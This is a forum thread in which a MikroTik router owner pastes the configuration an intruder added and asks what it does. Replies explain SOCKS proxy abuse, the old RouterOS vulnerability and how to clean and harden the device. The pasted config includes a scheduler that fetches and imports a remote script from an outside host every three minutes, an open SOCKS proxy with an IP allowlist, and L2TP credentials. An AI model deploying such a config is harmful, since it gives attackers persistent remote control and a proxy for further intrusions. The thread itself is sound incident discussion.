What is IP SOCKS ? I got hacked and they open this

Hello ,
what does IP-SOCKS used for?

someone enter my router last night and add this setting

/ip firewall filter
add action=accept chain=input dst-port=5678 protocol=tcp

/ip service
set ssh  port=26711
set api  disabled=yes
set winbox disabled=yes

/ip socks
set enabled=yes port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add action=deny src-address=0.0.0.0/0

/system scheduler
add interval=3m name=U6 on-event="/tool fetch url=http://zancetom.com/poll/6db\
    69e09-de68-4ca0-a9e7-363827bffb82 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=\
    startup

and also open L2TP client :

connect to : s38.eeongous.com
user: user4939176
password: user4939176

what is the damage of what he did ?
also what does the ip sock help him ?

Thanks,

Socks is for proxying:
https://wiki.mikrotik.com/wiki/Manual:IP/SOCKS

David1234, there could be other things set up, better do a clean reinstall of this system.

I have reinstall to avoid problems

but I wnat to understand what does SOCKS do ?
can you explain in simple words?
also , what he gain from add this ?

It’s a proxy server, similar to web proxy. They can use it to hide behind your router when they try to hack other devices. They will send request to proxy server on your router, it will send it to target, and target will think that it’s you hacking them.

Note that the hack is likely an indication of a bad firewall on your router.
After you have re-installed it make sure you configure the firewall properly.

Even if there would be no firewall at all, router can’t get hacked so easily. It would have to be another user error (missing or weak password), or something really wrong with RouterOS. That’s nothing against firewall, it’s of course good idea to have it.

He was likely running an old version of RouterOS which has a known vulnerabilty that allows remote attackers to log in to the router no matter what the password is.
(indeed, there was something really wrong with RouterOS)

Of course we do not know if there still are such issues so it is recommended to not allow incoming connections to the router from internet unless absolutely necessary.
(that means that you could enable incoming connections to a VPN service but never to the admin interfaces like ssh, telnet, winbox, webfig. when you require remote admin you use a VPN)

And set a password for winbox. I left it as just admin and someone’s personal laptop set up a PPTP service on the Mikrotik along with vpn/vpn as the user/pass for the VPN.
Consider firewalling your winbox on the LAN side.

you are right
the RouterOS is 6.40.1 , is it a problem?
I have many routers with this version (~ 50)

the password is not so easy (10 chars + 4 numbers no logic behind them - very very random )

will this help blocking? that way I allow only known (My own ) netwrok to enter the rotuer

/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes

also can someone please show me a simple example of what does the IP SOCKS do?
I understadn it allow traffic between router and external server
I never heard about this before - so if someone use it - can he show me a simple example and used case for it ?

Thanks ,

YES it is a BIG problem! With that version, people can walk in regardless of the complexity of your password.
You should update ASAP, and keep a bit more uptodate in the future.
However, I would not recommend to update to 6.48 (or any 6.xx version i.e. without extra .1 or higher) so for now it is best to upgrade to the long term version.
(currently 6.46.8)

the password is not so easy (10 chars + 4 numbers no logic behind them - very very random )

That does not matter, because in that version the attacker can download your password file before login and it contains your passwords in plaintext.

will this help blocking? that way I allow only known (My own ) netwrok to enter the rotuer

/ip service
set telnet disabled=yes
set ftp address=10.0.0.0/24,172.16.0.0/16
set www address=10.0.0.0/24 disabled=yes
set ssh address=10.0.0.0/24,172.16.0.0/16 port=2222
set api address=10.0.0.0/24,172.16.0.0/16
set winbox address=10.0.0.0/24,172.16.0.0/16
set api-ssl disabled=yes

>
>

I think it helps against this vulnerability but I am not sure.  I always add firewall rules to disallow access to the router from internet as well.

> also can someone please show me a simple example of what does the IP SOCKS do?

They now have established this site https://google.com/ where you can easily find answers to such generic questions...  maybe sometime you should try it!

I am seeing the same thing on multiple routers on my network.
Has anybody figured out what’s going on?
It has strangely been able to get on other routers within my network, enables IP socks and disables winbox port.
So far, no other harm found.

Yes, there were some well publicised vulnerabilities allowing remote unauthenticated access on devices which did not have firewall rules to restrict remote administrative access. It is good practice to only allow remote administrative access from a few known IP addresses, or better still via a VPN connection.

If some of your devices have been compromised the only reliable way to clean them is to use netinstall which completely erases the Mikrotik memory, and reconfigure from an export (.rsc file) NOT a backup (.backup file). Persistent changes can be made which are not visible through Winbox/Webfix/CLI, so cannot be removed, and are included in backups.

6.40.1 is ancient. And never ever leave winbox or any other services open to Internet.

Not only is it ancient but its negligent not to have updated them.
IF you have over 50 devices you must be an installer and have some sort of maintenance responsibility.
After you kick yourself in the arse, suggest you need to netinstall all 50 of those devices.